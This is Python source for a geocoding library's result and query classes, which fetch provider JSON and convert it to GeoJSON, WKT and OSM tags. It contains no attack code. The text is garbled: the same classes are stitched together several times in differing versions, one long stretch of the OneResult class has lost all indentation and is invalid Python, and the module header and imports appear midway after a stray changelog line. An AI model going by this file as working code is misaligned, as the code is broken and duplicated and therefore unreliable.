    state = ''
    country = ''
    postal = ''

    def __repr__(self):
        # "<[status] Provider - Method [address]>" when an address exists.
        if self.address:
            return u'<[{0}] {1} - {2} [{3}]>'.format(
                self.status,
                self.provider.title(),
                self.method.title(),
                six.text_type(self.address)
            )
        else:
            return u'<[{0}] {1} - {2}>'.format(
                self.status,
                self.provider.title(),
                self.method.title()
            )

    def rate_limited_get(self, url, **kwargs):
        """Plain session GET; hook for subclasses to add rate limiting."""
        return self.session.get(url, **kwargs)

    @staticmethod
    def _get_api_key(base_key, **kwargs):
        """Return the API key: explicit ``key`` kwarg wins over *base_key*.

        Raises ValueError when neither is provided.
        """
        key = kwargs.get('key')
        # Retrieves API Key from method argument first
        if key:
            return key
        # Retrieves API Key from Environment variables
        elif base_key:
            return base_key
        raise ValueError('Provide API Key')

    def _connect(self, **kwargs):
        """Perform the HTTP request and decode the JSON body.

        Sets ``status_code``, ``url``, ``content`` and ``error``.
        """
        self.status_code = 'Unknown'
        self.timeout = kwargs.get('timeout', 5.0)
        self.proxies = kwargs.get('proxies', '')
        self.headers.update(kwargs.get('headers', {}))
        self.params.update(kwargs.get('params', {}))
        try:
            r = self.rate_limited_get(
                self.url,
                params=self.params,
                headers=self.headers,
                timeout=self.timeout,
                proxies=self.proxies
            )
            self.status_code = r.status_code
            self.url = r.url
            # Any non-empty body is treated as success here.
            if r.content:
                self.status_code = 200
        except (KeyboardInterrupt, SystemExit):
            raise
        except requests.exceptions.SSLError:
            self.status_code = 495
            self.error = 'ERROR - SSLError'
        # Open JSON content from Request connection
        if self.status_code == 200:
            try:
                self.content = r.json()
            except Exception as err:
                # Keep the raw bytes when the body is not valid JSON.
                self.status_code = 400
                self.error = 'ERROR - JSON Corrupted: %s' % str(err)
                self.content = r.content

    def _initialize(self, **kwargs):
        """Fetch, parse and export the provider response.

        Called by subclass constructors (assumption — no caller visible
        here; TODO confirm).
        """
        # Remove extra URL from kwargs
        if 'url' in kwargs:
            kwargs.pop('url')
        self.json = {}
        self.parse = self.tree()
        self.content = None
        self.encoding = kwargs.get('encoding', 'utf-8')
        self.session = kwargs.get('session', requests.Session())
        self._connect(url=self.url, **kwargs)
        ###
        # NOTE(review): bare ``except:`` silently swallows ANY failure of
        # the per-result path (including AttributeError when ``next`` is
        # missing) and falls back to parsing the whole content blob.
        try:
            for result in self.next():  # Convert to iterator in each of the search tools
                self._build_tree(result)
                self._exceptions()
                self._catch_errors()
                self._json()
        except:
            self._build_tree(self.content)
            self._exceptions()
            self._catch_errors()
            self._json()
        ###

    def _json(self):
        """Export every truthy, non-excluded public attribute to ``json``."""
        self.fieldnames = []
        for key in dir(self):
            if not key.startswith('_') and key not in self._exclude:
                self.fieldnames.append(key)
                value = getattr(self, key)
                if value:
                    self.json[key] = value
        # Add OK attribute even if value is "False"
        self.json['ok'] = self.ok

    def debug(self):
        """Print parse tree, exported JSON, OSM-field coverage and URL."""
        print(json.dumps(self.parse, indent=4))
        print(json.dumps(self.json, indent=4))
        print('')
        print('OSM Quality')
        print('-----------')
        count = 0
        for key in self.osm:
            if 'addr:' in key:
                if self.json.get(key.replace('addr:', '')):
                    print('- [x] {0}'.format(key))
                    count += 1
                else:
                    print('- [ ] {0}'.format(key))
        # "- 2" discounts the always-present x/y entries of ``osm``.
        print('({0}/{1})'.format(count, len(self.osm) - 2))
        print('')
        print('Fieldnames')
        print('----------')
        count = 0
        for fieldname in self.fieldnames:
            if self.json.get(fieldname):
                print('- [x] {0}'.format(fieldname))
                count += 1
            else:
                print('- [ ] {0}'.format(fieldname))
        print('({0}/{1})'.format(count, len(self.fieldnames)))
        print('')
        print('URL')
        print('---')
        print(self.url)

    def _exceptions(self):
        # Hook for provider-specific response fix-ups; no-op by default.
        pass

    def _catch_errors(self):
        # Hook for provider-specific error detection; no-op by default.
        pass

    def tree(self):
        """Return an infinitely-nestable defaultdict."""
        return defaultdict(self.tree)

    def _build_tree(self, content, last=''):
        """Flatten *content* (a nested dict) into ``self.parse``.

        One level of nesting is preserved via the *last* parent key.
        """
        if content:
            if isinstance(content, dict):
                for key, value in content.items():
                    # Rebuild the tree if value is a dictionary
                    if isinstance(value, dict):
                        self._build_tree(value, last=key)
                    else:
                        if last:
                            self.parse[last][key] = value
                        else:
                            self.parse[key] = value

    @property
    def status(self):
        """Human-readable outcome: 'OK', a stored error, or a diagnosis."""
        if self.ok:
            return 'OK'
        elif self.error:
            return self.error
        if self.status_code == 200:
            if not self.address:
                return 'ERROR - No results found'
            elif not (self.lng and self.lat):
                return 'ERROR - No Geometry'
        return 'ERROR - Unhandled Exception'

    def _get_bbox(self, south, west, north, east):
        """Store bbox corners and return {northeast, southwest} (or {})."""
        if all([south, east, north, west]):
            # South Latitude, West Longitude, North Latitude, East Longitude
            self.south = float(south)
            self.west = float(west)
            self.north = float(north)
            self.east = float(east)
            # Bounding Box Corners
            self.northeast = [self.north, self.east]
            self.northwest = [self.north, self.west]
            self.southwest = [self.south, self.west]
            self.southeast = [self.south, self.east]
            # GeoJSON bbox
            self.westsouth = [self.west, self.south]
            self.eastnorth = [self.east, self.north]
            return dict(northeast=self.northeast, southwest=self.southwest)
        return {}

    @property
    def confidence(self):
        """Score 1-10 from bbox diagonal size (smaller box = higher); 0 if unknown."""
        if self.bbox:
            # Units are measured in Kilometers
            distance = Distance(self.northeast, self.southwest, units='km')
            for score, maximum in [(10, 0.25),
                                   (9, 0.5),
                                   (8, 1),
                                   (7, 5),
                                   (6, 7.5),
                                   (5, 10),
                                   (4, 15),
                                   (3, 20),
                                   (2, 25)]:
                if distance < maximum:
                    return score
            if distance >= 25:
                return 1
        # Cannot determine score
        return 0

    @property
    def ok(self):
        # A result is OK when both coordinates are truthy.
        return bool(self.lng and self.lat)

    @property
    def geometry(self):
        """GeoJSON Point geometry, or {} when no coordinates."""
        if self.ok:
            return {
                'type': 'Point',
                'coordinates': [self.x, self.y]}
        return {}

    @property
    def osm(self):
        """OSM-style tag dict (x/y plus addr:* tags), or {} when not ok."""
        osm = dict()
        if self.ok:
            osm['x'] = self.x
            osm['y'] = self.y
            if self.housenumber:
                osm['addr:housenumber'] = self.housenumber
            if self.road:
                osm['addr:street'] = self.road
            if self.city:
                osm['addr:city'] = self.city
            if self.state:
                osm['addr:state'] = self.state
            if self.country:
                osm['addr:country'] = self.country
            if self.postal:
                osm['addr:postal'] = self.postal
            if hasattr(self, 'population'):
                if self.population:
                    osm['population'] = self.population
        return osm

    @property
    def geojson(self):
        """GeoJSON Feature with properties, optional bbox and geometry."""
        feature = {
            'type': 'Feature',
            'properties': self.json,
        }
        if self.bbox:
            feature['bbox'] = [self.west, self.south, self.east, self.north]
            feature['properties']['bbox'] = feature['bbox']
        if self.geometry:
            feature['geometry'] = self.geometry
        return feature

    @property
    def wkt(self):
        """Well-Known Text point, or '' when no coordinates."""
        if self.ok:
            return 'POINT({x} {y})'.format(x=self.x, y=self.y)
        return ''

    @property
    def xy(self):
        # [lng, lat] order (GeoJSON convention).
        if self.ok:
            return [self.lng, self.lat]
        return []

    @property
    def latlng(self):
        # [lat, lng] order.
        if self.ok:
            return [self.lat, self.lng]
        return []

    @property
    def y(self):
        # Cartesian alias: y == latitude.
        return self.lat

    @property
    def x(self):
        # Cartesian alias: x == longitude.
        return self.lng

    @property
    def locality(self):
        # Alias for ``city``.
        return self.city

    @property
    def province(self):
        # Alias for ``state``.
        return self.state

    @property
    def street_number(self):
        # Alias for ``housenumber``.
        return self.housenumber

    @property
    def road(self):
        # Alias for ``street`` (shadows the ``road = ''`` class attribute).
        return self.street

    @property
    def route(self):
        # Alias for ``street``.
        return self.street
class OneResult(object):
""" Container for one (JSON) object returned by the various web services"""
_TO_EXCLUDE = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
'short_name', 'api', 'content', 'params',
'street_number', 'api_key', 'key', 'id', 'x', 'y',
'latlng', 'headers', 'timeout', 'wkt', 'locality',
'province', 'rate_limited_get', 'osm', 'route', 'schema',
'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
'xy', 'northeast', 'northwest', 'southeast', 'southwest',
'road_long', 'city_long', 'state_long', 'country_long',
'postal_town_long', 'province_long', 'road_long',
'street_long', 'interpolated', 'method', 'geometry', 'session']
def __init__(self, json_content):
self.raw = json_content
# attributes required to compute bbox
self.northeast = []
self.northwest = []
self.southeast = []
self.southwest = []
# attributes returned in JSON format
self.fieldnames = []
self.json = {}
self._parse_json_with_fieldnames()
# Essential attributes for Quality Control
@property # noqa
def lat(self): return '' # noqa
@property # noqa
def lng(self): return '' # noqa
@property # noqa
def accuracy(self): return '' # noqa
@property # noqa
def quality(self): return '' # noqa
# Bounding Box attributes
@property # noqa
def bbox(self): return {} # noqa
# Essential attributes for Street Address
@property # noqa
def address(self): return '' # noqa
@property # noqa
def housenumber(self): return '' # noqa
@property # noqa
def street(self): return '' # noqa
@property # noqa
def city(self): return '' # noqa
@property # noqa
def state(self): return '' # noqa
@property # noqa
def country(self): return '' # noqa
@property # noqa
def postal(self): return '' # noqa
def __repr__(self):
""" Display [address] if available; [lat,lng] otherwise"""
if self.address:
return u'[{0}]'.format(six.text_type(self.address))
else:
return u'[{0},{1}]'.format(self.lat, self.lng)
def _parse_json_with_fieldnames(self):
""" Parse the raw JSON with all attributes/methods defined in the class, except for the
ones defined starting with '_' or flagged in cls._TO_EXCLUDE.
The final result is stored in self.json
"""
for key in dir(self):
if not key.startswith('_') and key not in self._TO_EXCLUDE:
self.fieldnames.append(key)
value = getattr(self, key)
if value:
self.json[key] = value
# Add OK attribute even if value is "False"
self.json['ok'] = self.ok
@property
def ok(self):
return bool(self.lng and self.lat)
@property
def status(self):
if self.ok:
return 'OK'
if not self.address:
return 'ERROR - No results found'
return 'ERROR - No Geometry'
def debug(self):
print('')
print('From provider')
print('-----------')
print(json.dumps(self.raw, indent=4))
print('')
print('Cleaned json')
print('-----------')
print(json.dumps(self.json, indent=4))
print('')
print('OSM Quality')
print('-----------')
count = 0
for key in self.osm:
if 'addr:' in key:
if self.json.get(key.replace('addr:', '')):
print('- [x] {0}'.format(key))
count += 1
else:
print('- [ ] {0}'.format(key))
print('({0}/{1})'.format(count, len(self.osm) - 2))
print('')
print('Fieldnames')
print('----------')
count = 0
for fieldname in self.fieldnames:
if self.json.get(fieldname):
print('- [x] {0}'.format(fieldname))
count += 1
else:
print('- [ ] {0}'.format(fieldname))
print('({0}/{1})'.format(count, len(self.fieldnames)))
def _get_bbox(self, south, west, north, east):
if all([south, east, north, west]):
# South Latitude, West Longitude, North Latitude, East Longitude
self.south = float(south)
self.west = float(west)
self.north = float(north)
self.east = float(east)
# Bounding Box Corners
self.northeast = [self.north, self.east]
self.northwest = [self.north, self.west]
self.southwest = [self.south, self.west]
self.southeast = [self.south, self.east]
# GeoJSON bbox
self.westsouth = [self.west, self.south]
self.eastnorth = [self.east, self.north]
return dict(northeast=self.northeast, southwest=self.southwest)
return {}
@property
def confidence(self):
    """Score 1-10 derived from bbox size (10 = tightest); 0 when no bbox is known."""
    if not self.bbox:
        # Cannot determine score
        return 0
    # Units are measured in Kilometers
    distance = Distance(self.northeast, self.southwest, units='km')
    for score, maximum_km in ((10, 0.25), (9, 0.5), (8, 1), (7, 5),
                              (6, 7.5), (5, 10), (4, 15), (3, 20), (2, 25)):
        if distance < maximum_km:
            return score
    # Anything 25 km or larger gets the lowest score.
    return 1
@property
def geometry(self):
    """GeoJSON Point geometry, or an empty dict when coordinates are missing."""
    if not self.ok:
        return {}
    return {'type': 'Point', 'coordinates': [self.x, self.y]}
@property
def osm(self):
    """Result serialized as OpenStreetMap-style tags ('addr:*' keys plus x/y)."""
    osm = dict()
    # Coordinates only when the result actually has geometry.
    if self.ok:
        osm['x'] = self.x
        osm['y'] = self.y
    if self.housenumber:
        osm['addr:housenumber'] = self.housenumber
    # NOTE(review): the street tag is fed from self.road (an alias of self.street).
    if self.road:
        osm['addr:street'] = self.road
    if self.city:
        osm['addr:city'] = self.city
    if self.state:
        osm['addr:state'] = self.state
    if self.country:
        osm['addr:country'] = self.country
    if self.postal:
        osm['addr:postal'] = self.postal
    # population is only defined by some providers, hence the hasattr guard.
    if hasattr(self, 'population'):
        if self.population:
            osm['population'] = self.population
    return osm
@property
def geojson(self):
    """Result as a GeoJSON Feature; bbox is attached when one is available."""
    feature = {'type': 'Feature', 'properties': self.json}
    if self.bbox:
        # Same list object is shared between the two keys, as before.
        bounds = [self.west, self.south, self.east, self.north]
        feature['bbox'] = bounds
        feature['properties']['bbox'] = bounds
    if self.geometry:
        feature['geometry'] = self.geometry
    return feature
@property
def wkt(self):
    """Well-Known Text (WKT) point, or an empty string when not ok."""
    if not self.ok:
        return ''
    return 'POINT({x} {y})'.format(x=self.x, y=self.y)
@property
def xy(self):
    """Coordinates in x/y order ([lng, lat]), or [] when not ok."""
    return [self.lng, self.lat] if self.ok else []
@property
def latlng(self):
    """Coordinates in lat/lng order, or [] when not ok."""
    return [self.lat, self.lng] if self.ok else []
@property
def y(self):
    """Alias for latitude (the y axis)."""
    return self.lat
@property
def x(self):
    """Alias for longitude (the x axis)."""
    return self.lng
@property
def locality(self):
    """Alias for city."""
    return self.city
@property
def province(self):
    """Alias for state."""
    return self.state
@property
def street_number(self):
    """Alias for housenumber."""
    return self.housenumber
@property
def road(self):
    """Alias for street."""
    return self.street
@property
def route(self):
    """Alias for street."""
    return self.street
class MultipleResultsQuery(OrderedSet):
    """ Will replace the Base class to support multiple results, with the following differences :

        - split class into 2 parts :
            - OneResult to actually store a (JSON) object from provider
            - MultipleResultsQuery to manage the query
        - class variables moved into instance
        - remaining class variables are names with convention: _CAPITALS
        - self.url derived from class var cls.URL, which must be a valid URL
        - self.timeout has default value from class var cls.TIMEOUT
    """
    _URL = None
    _RESULT_CLASS = None
    _KEY = None
    _TIMEOUT = 5.0

    @staticmethod
    def _is_valid_url(url):
        """ Helper function to validate that URLs are well formed, i.e that it contains a valid
            protocol and a valid domain. It does not actually check if the URL exists
        """
        try:
            parsed = urlparse(url)
            mandatory_parts = [parsed.scheme, parsed.netloc]
            return all(mandatory_parts)
        except Exception:
            # Fix: was a bare 'except:', which also swallowed SystemExit /
            # KeyboardInterrupt; only genuine parse failures mean "invalid".
            return False

    @classmethod
    def _is_valid_result_class(cls):
        """True when the subclass declared a OneResult-derived _RESULT_CLASS."""
        return issubclass(cls._RESULT_CLASS, OneResult)

    @classmethod
    def _get_api_key(cls, key=None):
        """Return *key* when given, else the class-level default; raise when neither exists."""
        # Retrieves API Key from method argument first, then from Environment variables
        key = key or cls._KEY
        # raise exception if not valid key found
        if not key:
            raise ValueError('Provide API Key')
        return key

    def __init__(self, location, **kwargs):
        """Validate the class configuration, build the request, then run the query.

        Recognized keyword arguments: key, encoding, timeout, proxies, session,
        headers, params; everything else is forwarded to the subclass hooks
        (_build_headers / _build_params / _before_initialize).
        """
        super(MultipleResultsQuery, self).__init__()
        # check validity of URL
        if not self._is_valid_url(self._URL):
            raise ValueError("Subclass must define a valid URL")
        self.url = self._URL
        # check validity of Result class
        if not self._is_valid_result_class():
            raise ValueError(
                "Your class should define _RESULT_CLASS with a subclass of OneResult")
        self.one_result = self._RESULT_CLASS
        # check validity of provider key
        provider_key = self._get_api_key(kwargs.pop('key', None))
        # point to geocode, as a string or coordinates
        self.location = location
        # set attributes to manage query
        self.encoding = kwargs.get('encoding', 'utf-8')
        self.timeout = kwargs.get('timeout', self._TIMEOUT)
        self.proxies = kwargs.get('proxies', '')
        self.session = kwargs.get('session', requests.Session())
        # headers can be overriden in _build_headers
        self.headers = kwargs.get(
            'headers', self._build_headers(provider_key, **kwargs))
        # params can be overriden in _build_params
        # it is an OrderedDict in order to preserver the order of the url query parameters
        self.params = OrderedDict(kwargs.get(
            'params', self._build_params(location, provider_key, **kwargs)))
        # results of query (set by _connect)
        self.status_code = None
        self.response = None
        self.error = False
        # pointer to result where to delegates calls
        self.current_result = None
        # hook for children class to finalize their setup before the query
        self._before_initialize(location, **kwargs)
        # query and parse results
        self._initialize()

    def __repr__(self):
        """Status, provider and method plus a summary of the result set."""
        base_repr = u'<[{0}] {1} - {2} {{0}}>'.format(
            self.status,
            self.provider.title(),
            self.method.title()
        )
        if len(self) == 0:
            return base_repr.format(u'[empty]')
        elif len(self) == 1:
            return base_repr.format(repr(self[0]))
        else:
            return base_repr.format(u'#%s results' % len(self))

    def _build_headers(self, provider_key, **kwargs):
        """Will be overridden according to the targetted web service"""
        return {}

    def _build_params(self, location, provider_key, **kwargs):
        """Will be overridden according to the targetted web service"""
        return {}

    def _before_initialize(self, location, **kwargs):
        """Can be overridden to finalize setup before the query"""
        pass

    def _initialize(self):
        """Run the HTTP query and, on success, parse results into the set."""
        # query URL and get valid JSON (also stored in self.json)
        json_response = self._connect()
        # catch errors
        has_error = self._catch_errors(
            json_response) if json_response else True
        # creates instances for results
        if not has_error:
            self._parse_results(json_response)

    def _connect(self):
        """ - Query self.url (validated cls._URL)
            - Analyse reponse and set status, errors accordingly
            - On success:
                returns the content of the response as a JSON object
        """
        self.status_code = 'Unknown'
        response = None
        try:
            # make request and get response
            self.response = response = self.rate_limited_get(
                self.url,
                params=self.params,
                headers=self.headers,
                timeout=self.timeout,
                proxies=self.proxies
            )
            # check that response is ok
            response.raise_for_status()
            self.status_code = 200
            # rely on json method to get non-empty well formatted JSON
            json_response = response.json()
            self.url = response.url
        except requests.exceptions.RequestException as err:
            # Fix: 'response' was unbound when the request itself failed
            # (connection error / timeout), turning this handler into a NameError.
            if response is not None:
                self.status_code = response.status_code
                self.error = u'ERROR - {}'.format(str(response))
            else:
                self.error = u'ERROR - {}'.format(str(err))
            return False
        # return response within its JSON format
        return json_response

    def rate_limited_get(self, url, **kwargs):
        """ By default, simply wraps a session.get request"""
        return self.session.get(url, **kwargs)

    def _adapt_results(self, json_content):
        """ Allow children classes to format json_content into an array of objects
            OVERRIDE TO FETCH the correct array of objects when necessary
        """
        return json_content

    def _parse_results(self, json_content):
        """ Creates instances of self.one_result (validated cls._RESULT_CLASS)
            from JSON results retrieved by self._connect
        """
        for json_dict in self._adapt_results(json_content):
            self.add(self.one_result(json_dict))
        # Fix: only set the default delegation target when there is at least
        # one result; indexing self[0] unconditionally raised IndexError on
        # an empty result set.
        if len(self):
            self.current_result = self[0]

    def _catch_errors(self, json_response):
        """ Checks the JSON returned from the provider and flag errors if necessary"""
        return self.error

    @property
    def ok(self):
        """True when at least one result was parsed."""
        return len(self) > 0

    @property
    def status(self):
        """Human-readable outcome of the whole query."""
        if self.ok:
            return 'OK'
        # Fix: the provider error (if any) must be checked before the generic
        # "no results" message — the old elif order made the error branch
        # unreachable, since not-ok always implied len(self) == 0.
        elif self.error:
            return self.error
        elif len(self) == 0:
            return 'ERROR - No results found'
        else:
            return 'ERROR - Unhandled Exception'

    @property
    def geojson(self):
        """All results wrapped in a GeoJSON FeatureCollection."""
        geojson_results = [result.geojson for result in self]
        features = {
            'type': 'FeatureCollection',
            'features': geojson_results
        }
        return features

    def debug(self):
        """Print query status, then the debug output of every result."""
        print('===')
        print(repr(self))
        print('===')
        print('')
        print('#res: {}'.format(len(self)))
        print('code: {}'.format(self.status_code))
        print('url:  {}'.format(self.url))
        if self.ok:
            for index, result in enumerate(self):
                print('')
                print('Details for result #{}'.format(index + 1))
                print('---')
                result.debug()
        else:
            print(self.status)

    # Delegation to current result
    def set_default_result(self, index):
        """ change the result used to delegate the calls to. The provided index should be in the
            range of results, otherwise it will raise an exception
        """
        self.current_result = self[index]

    def __getattr__(self, name):
        """ Called when an attribute lookup has not found the attribute in the usual places (i.e.
            it is not an instance attribute nor is it found in the class tree for self).

            Delegates the lookup to the currently selected result.
        """
        if self.current_result is None:
            # Fix: the original mixed '%s' placeholders with str.format(), so
            # the message was never interpolated.
            raise AttributeError('{0} not found on {1}, and current_result is None'.format(
                name, self.__class__.__name__))
        return getattr(self.current_result, name)
# Changelog: added a check for when the provider returns no results.
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import requests
import sys
import json
import six
from collections import defaultdict, OrderedDict
from orderedset import OrderedSet
from geocoder.distance import Distance
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
# True on any Python 2.x interpreter, False on 3.x.
is_python2 = sys.version_info.major < 3
class Base(object):
    """Legacy single-result base class for geocoder providers.

    NOTE(review): superseded by OneResult / MultipleResultsQuery defined
    later in this module; presumably kept while providers are migrated —
    confirm before removing.
    """
    # Attribute names that _json() must NOT copy into self.json.
    _exclude = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
                'short_name', 'api', 'content', 'params',
                'street_number', 'api_key', 'key', 'id', 'x', 'y',
                'latlng', 'headers', 'timeout', 'wkt', 'locality',
                'province', 'rate_limited_get', 'osm', 'route', 'schema',
                'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
                'xy', 'northeast', 'northwest', 'southeast', 'southwest',
                'road_long', 'city_long', 'state_long', 'country_long',
                'postal_town_long', 'province_long', 'road_long',
                'street_long', 'interpolated', 'method', 'geometry', 'session']
    fieldnames = []
    error = None
    status_code = None
    session = None
    # NOTE(review): headers/params are mutable CLASS attributes and _connect()
    # updates them in place, so state can leak across instances and
    # subclasses — confirm before relying on per-instance isolation.
    headers = {}
    params = {}
    # Essential attributes for Quality Control
    lat = ''
    lng = ''
    accuracy = ''
    quality = ''
    # NOTE(review): shadowed by the 'confidence' property defined below.
    confidence = ''
    # Bounding Box attributes
    northeast = []
    northwest = []
    southeast = []
    southwest = []
    bbox = {}
    # Essential attributes for Street Address
    address = ''
    housenumber = ''
    street = ''
    # NOTE(review): shadowed by the 'road' property defined below.
    road = ''
    city = ''
    state = ''
    country = ''
    postal = ''

    def __repr__(self):
        # self.provider / self.method are expected to be defined by subclasses.
        if self.address:
            return u'<[{0}] {1} - {2} [{3}]>'.format(
                self.status,
                self.provider.title(),
                self.method.title(),
                six.text_type(self.address)
            )
        else:
            return u'<[{0}] {1} - {2}>'.format(
                self.status,
                self.provider.title(),
                self.method.title()
            )

    def rate_limited_get(self, url, **kwargs):
        # Hook point: subclasses may throttle requests here.
        return self.session.get(url, **kwargs)

    @staticmethod
    def _get_api_key(base_key, **kwargs):
        """Return the key from kwargs first, else *base_key*; raise when neither exists."""
        key = kwargs.get('key')
        # Retrieves API Key from method argument first
        if key:
            return key
        # Retrieves API Key from Environment variables
        elif base_key:
            return base_key
        raise ValueError('Provide API Key')

    def _connect(self, **kwargs):
        """Perform the HTTP request and populate content/status_code/error."""
        self.status_code = 'Unknown'
        self.timeout = kwargs.get('timeout', 5.0)
        self.proxies = kwargs.get('proxies', '')
        self.headers.update(kwargs.get('headers', {}))
        self.params.update(kwargs.get('params', {}))
        try:
            r = self.rate_limited_get(
                self.url,
                params=self.params,
                headers=self.headers,
                timeout=self.timeout,
                proxies=self.proxies
            )
            self.status_code = r.status_code
            self.url = r.url
            # Any non-empty body is treated as success here.
            if r.content:
                self.status_code = 200
        except (KeyboardInterrupt, SystemExit):
            raise
        # NOTE(review): only SSL errors are handled; other request failures
        # (timeouts, connection errors) propagate to the caller — confirm intent.
        except requests.exceptions.SSLError:
            self.status_code = 495
            self.error = 'ERROR - SSLError'
        # Open JSON content from Request connection
        if self.status_code == 200:
            try:
                self.content = r.json()
            except Exception as err:
                # Keep the raw bytes so callers can still inspect the payload.
                self.status_code = 400
                self.error = 'ERROR - JSON Corrupted: %s' % str(err)
                self.content = r.content

    def _initialize(self, **kwargs):
        """Run the query, build the parse tree and the cleaned JSON."""
        # Remove extra URL from kwargs
        if 'url' in kwargs:
            kwargs.pop('url')
        self.json = {}
        self.parse = self.tree()
        self.content = None
        self.encoding = kwargs.get('encoding', 'utf-8')
        self.session = kwargs.get('session', requests.Session())
        self._connect(url=self.url, **kwargs)
        ###
        try:
            for result in self.next():  # Convert to iterator in each of the search tools
                self._build_tree(result)
                self._exceptions()
                self._catch_errors()
                self._json()
        # NOTE(review): bare except — providers without next() fall back to
        # parsing self.content directly, but real bugs are swallowed too.
        except:
            self._build_tree(self.content)
            self._exceptions()
            self._catch_errors()
            self._json()
        ###

    def _json(self):
        """Collect every public, truthy attribute (via dir()) into self.json."""
        self.fieldnames = []
        for key in dir(self):
            if not key.startswith('_') and key not in self._exclude:
                self.fieldnames.append(key)
                value = getattr(self, key)
                if value:
                    self.json[key] = value
        # Add OK attribute even if value is "False"
        self.json['ok'] = self.ok

    def debug(self):
        """Print the parse tree, cleaned JSON, OSM/fieldname checklists and URL."""
        print(json.dumps(self.parse, indent=4))
        print(json.dumps(self.json, indent=4))
        print('')
        print('OSM Quality')
        print('-----------')
        count = 0
        for key in self.osm:
            if 'addr:' in key:
                # The cleaned json stores address parts without the 'addr:' prefix.
                if self.json.get(key.replace('addr:', '')):
                    print('- [x] {0}'.format(key))
                    count += 1
                else:
                    print('- [ ] {0}'.format(key))
        print('({0}/{1})'.format(count, len(self.osm) - 2))
        print('')
        print('Fieldnames')
        print('----------')
        count = 0
        for fieldname in self.fieldnames:
            if self.json.get(fieldname):
                print('- [x] {0}'.format(fieldname))
                count += 1
            else:
                print('- [ ] {0}'.format(fieldname))
        print('({0}/{1})'.format(count, len(self.fieldnames)))
        print('')
        print('URL')
        print('---')
        print(self.url)

    def _exceptions(self):
        # Hook: subclasses may post-process the parse tree here.
        pass

    def _catch_errors(self):
        # Hook: subclasses may flag provider-specific errors here.
        pass

    def tree(self):
        """Infinitely-nestable defaultdict used as the parse tree."""
        return defaultdict(self.tree)

    def _build_tree(self, content, last=''):
        """Flatten nested dicts into self.parse, keyed by the parent dict's name."""
        if content:
            if isinstance(content, dict):
                for key, value in content.items():
                    # Rebuild the tree if value is a dictionary
                    if isinstance(value, dict):
                        self._build_tree(value, last=key)
                    else:
                        if last:
                            self.parse[last][key] = value
                        else:
                            self.parse[key] = value

    @property
    def status(self):
        """Human-readable outcome of the request."""
        if self.ok:
            return 'OK'
        elif self.error:
            return self.error
        if self.status_code == 200:
            if not self.address:
                return 'ERROR - No results found'
            elif not (self.lng and self.lat):
                return 'ERROR - No Geometry'
        return 'ERROR - Unhandled Exception'

    def _get_bbox(self, south, west, north, east):
        """Store bounding-box corners; return {'northeast':..., 'southwest':...} or {}."""
        # NOTE(review): the truthiness test treats valid 0.0 edges
        # (equator / prime meridian) as missing — confirm intent.
        if all([south, east, north, west]):
            # South Latitude, West Longitude, North Latitude, East Longitude
            self.south = float(south)
            self.west = float(west)
            self.north = float(north)
            self.east = float(east)
            # Bounding Box Corners
            self.northeast = [self.north, self.east]
            self.northwest = [self.north, self.west]
            self.southwest = [self.south, self.west]
            self.southeast = [self.south, self.east]
            # GeoJSON bbox
            self.westsouth = [self.west, self.south]
            self.eastnorth = [self.east, self.north]
            return dict(northeast=self.northeast, southwest=self.southwest)
        return {}

    @property
    def confidence(self):
        """Score 1-10 from bbox size (10 = tightest); 0 when no bbox is known."""
        if self.bbox:
            # Units are measured in Kilometers
            distance = Distance(self.northeast, self.southwest, units='km')
            for score, maximum in [(10, 0.25),
                                   (9, 0.5),
                                   (8, 1),
                                   (7, 5),
                                   (6, 7.5),
                                   (5, 10),
                                   (4, 15),
                                   (3, 20),
                                   (2, 25)]:
                if distance < maximum:
                    return score
            if distance >= 25:
                return 1
        # Cannot determine score
        return 0

    @property
    def ok(self):
        # Both coordinates must be present (truthy).
        return bool(self.lng and self.lat)

    @property
    def geometry(self):
        """GeoJSON Point geometry, or {} when coordinates are missing."""
        if self.ok:
            return {
                'type': 'Point',
                'coordinates': [self.x, self.y]}
        return {}

    @property
    def osm(self):
        """Result serialized as OpenStreetMap-style tags ('addr:*' keys plus x/y)."""
        osm = dict()
        if self.ok:
            osm['x'] = self.x
            osm['y'] = self.y
        if self.housenumber:
            osm['addr:housenumber'] = self.housenumber
        if self.road:
            osm['addr:street'] = self.road
        if self.city:
            osm['addr:city'] = self.city
        if self.state:
            osm['addr:state'] = self.state
        if self.country:
            osm['addr:country'] = self.country
        if self.postal:
            osm['addr:postal'] = self.postal
        # population is only defined by some providers, hence the hasattr guard.
        if hasattr(self, 'population'):
            if self.population:
                osm['population'] = self.population
        return osm

    @property
    def geojson(self):
        """Result as a GeoJSON Feature; bbox attached when available."""
        feature = {
            'type': 'Feature',
            'properties': self.json,
        }
        if self.bbox:
            feature['bbox'] = [self.west, self.south, self.east, self.north]
            feature['properties']['bbox'] = feature['bbox']
        if self.geometry:
            feature['geometry'] = self.geometry
        return feature

    @property
    def wkt(self):
        """Well-Known Text point, or '' when not ok."""
        if self.ok:
            return 'POINT({x} {y})'.format(x=self.x, y=self.y)
        return ''

    @property
    def xy(self):
        """Coordinates in x/y order ([lng, lat]), or [] when not ok."""
        if self.ok:
            return [self.lng, self.lat]
        return []

    @property
    def latlng(self):
        """Coordinates in lat/lng order, or [] when not ok."""
        if self.ok:
            return [self.lat, self.lng]
        return []

    @property
    def y(self):
        # Alias for latitude.
        return self.lat

    @property
    def x(self):
        # Alias for longitude.
        return self.lng

    @property
    def locality(self):
        # Alias for city.
        return self.city

    @property
    def province(self):
        # Alias for state.
        return self.state

    @property
    def street_number(self):
        # Alias for housenumber.
        return self.housenumber

    @property
    def road(self):
        # Alias for street.
        return self.street

    @property
    def route(self):
        # Alias for street.
        return self.street
class OneResult(object):
    """ Container for one (JSON) object returned by the various web services"""
    # Attribute names that _parse_json_with_fieldnames() must NOT copy into self.json.
    _TO_EXCLUDE = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
                   'short_name', 'api', 'content', 'params',
                   'street_number', 'api_key', 'key', 'id', 'x', 'y',
                   'latlng', 'headers', 'timeout', 'wkt', 'locality',
                   'province', 'rate_limited_get', 'osm', 'route', 'schema',
                   'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
